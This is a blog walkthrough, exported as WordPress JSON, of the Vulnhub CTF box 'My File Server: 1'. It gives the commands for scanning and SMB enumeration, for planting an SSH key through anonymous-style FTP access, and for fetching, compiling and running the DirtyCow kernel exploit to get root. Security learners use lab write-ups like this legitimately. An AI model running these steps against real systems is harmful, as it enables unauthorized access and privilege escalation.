{"id":25639,"date":"2020-03-28T17:01:30","date_gmt":"2020-03-28T11:31:30","guid":{"rendered":"https:\/\/www.armourinfosec.com\/?p=25639"},"modified":"2020-04-09T09:53:34","modified_gmt":"2020-04-09T04:23:34","slug":"my-file-server-1-walkthrough","status":"publish","type":"post","link":"https:\/\/www.armourinfosec.com\/my-file-server-1-walkthrough\/","title":{"rendered":"My File Server: 1 Walkthrough"},"content":{"rendered":"
My File Server: 1<\/a> Walkthrough Vulnhub CTF<\/p>\n I will share with you a new walkthrough for a Vulnhub machine, My File Server: 1. This CTF machine was created by Akanksha Sachin Verma, and you can download the CTF here. I would call this box on the easy side, but there are a lot of moving parts which can cause you to follow some different directions. I don\u2019t want to say too much, so let\u2019s get at it.<\/p>\n Network Scan<\/strong><\/p>\n Enumeration<\/strong><\/p>\n Exploit<\/strong><\/p>\n Privilege Escalation<\/strong><\/p>\n As always, we start with netdiscover to get the IP of the VM; the IP of the host I found is 192.168.2.5.<\/p>\n <\/p>\n Let\u2019s proceed with a network scan using an Nmap aggressive scan, as given below.<\/p>\n <\/p>\n It was very interesting, as there were so many services running on the host. We saw that FTP had \u201canonymous login enabled\u201d and that port 445 was also open for SMB.<\/p>\n <\/p>\n In order to enumerate SMB and identify the username \u201csmbuser\u201d, I used the following commands.<\/p>\n <\/p>\n On running the Nmap SMB script, we found a user named smbuser.<\/p>\n <\/p>\n We also explored the host in the web browser, as port 80 was open for the HTTP service. There was nothing special on the web page, just a link to Armour Infosec.<\/p>\n <\/p>\n I chose to run Nikto to list weak HTTP configuration, and luckily found an entry for \u201creadme.txt\u201d; let\u2019s open this in the web browser.<\/p>\n <\/p>\n I think the author kept this file as a clue: the password is meant to be found by reading the readme.txt file. 
So now I had the username \u201csmbuser\u201d and the password \u201crootroot1\u201d, and it was time to connect to the host machine via SSH. I tried these credentials for SSH login, but got a connection timeout error, which means that the user \u201csmbuser\u201d cannot log in to the host machine over SSH this way.<\/p>\n <\/p>\n Now it was time to generate some SSH keys, so we used ssh-keygen on our local machine (Kali Linux) to generate a key pair without a passphrase. After the key was created, we moved into the .ssh directory in our local shell, where we saw the public key named \u201cid_rsa.pub\u201d.<\/p>\n Let\u2019s generate keys for SSH so we can log in as smbuser!<\/p>\n Steps:<\/p>\n <\/p>\n With the help of the credentials enumerated above, \u201csmbuser:rootroot1<\/strong>\u201d, we logged into FTP, created a folder named .ssh inside \/home\/smbuser, and then uploaded the id_rsa.pub generated in the step above as authorized_keys inside the .ssh directory.<\/p>\n <\/p>\n Now we should be able to SSH in with the private key:<\/p>\n <\/p>\n <\/p>\n I found that a really old kernel version is running here, so I looked for a piece of exploit code, and luckily the one I found was a DIRTYCOW exploit. So, I downloaded an exploit from Exploit-DB<\/a> written in C.<\/p>\n <\/p>\n I downloaded the exploit onto the host machine and compiled it before running it, so I ran the following commands.<\/p>\n Eureka……. Root ……<\/p>\n <\/p>\n Boom! We got the root shell by running .\/dasagreeva<\/strong> and finally obtained the proof.txt<\/strong> file.<\/p>\n <\/strong><\/p>\n<\/strong><\/h3>\n
Penetration Testing Methodologies<\/strong><\/h3>\n
\n
\n
\n
\n
Network Scanning<\/h4>\n
netdiscover -i vboxnet0<\/pre>\n
nmap -p- -A 192.168.2.5<\/pre>\n
Enumeration<\/h3>\n
smbmap -H 192.168.2.5\r\nsmbclient -L 192.168.2.5<\/pre>\n
nmap --script smb-enum-shares.nse -p445 192.168.2.6<\/pre>\n
nikto -h http:\/\/192.168.2.5<\/pre>\n
Exploitation<\/strong><\/h3>\n
\n
ssh-keygen\r\ncd .ssh\r\nls -lha\r\n<\/pre>\n
ftp 192.168.2.5\r\npwd\r\nmkdir .ssh\r\ncd .ssh\r\nput \/root\/.ssh\/id_rsa.pub authorized_keys\r\nexit\r\n<\/pre>\n
ssh -i id_rsa smbuser@192.168.2.5<\/pre>\n
uname -a<\/pre>\n
Privilege Escalation <\/strong><\/h3>\n
python -m SimpleHTTPServer 8080\r\nON THE SHELL\r\nwget http:\/\/192.168.2.1:8080\/40616.c\r\ngcc 40616.c -o dasagreeva -pthread\r\n.\/dasagreeva<\/pre>\n
cd \/root\r\nls\r\ncat proof.txt\r\nid\r\nhostname<\/pre>\n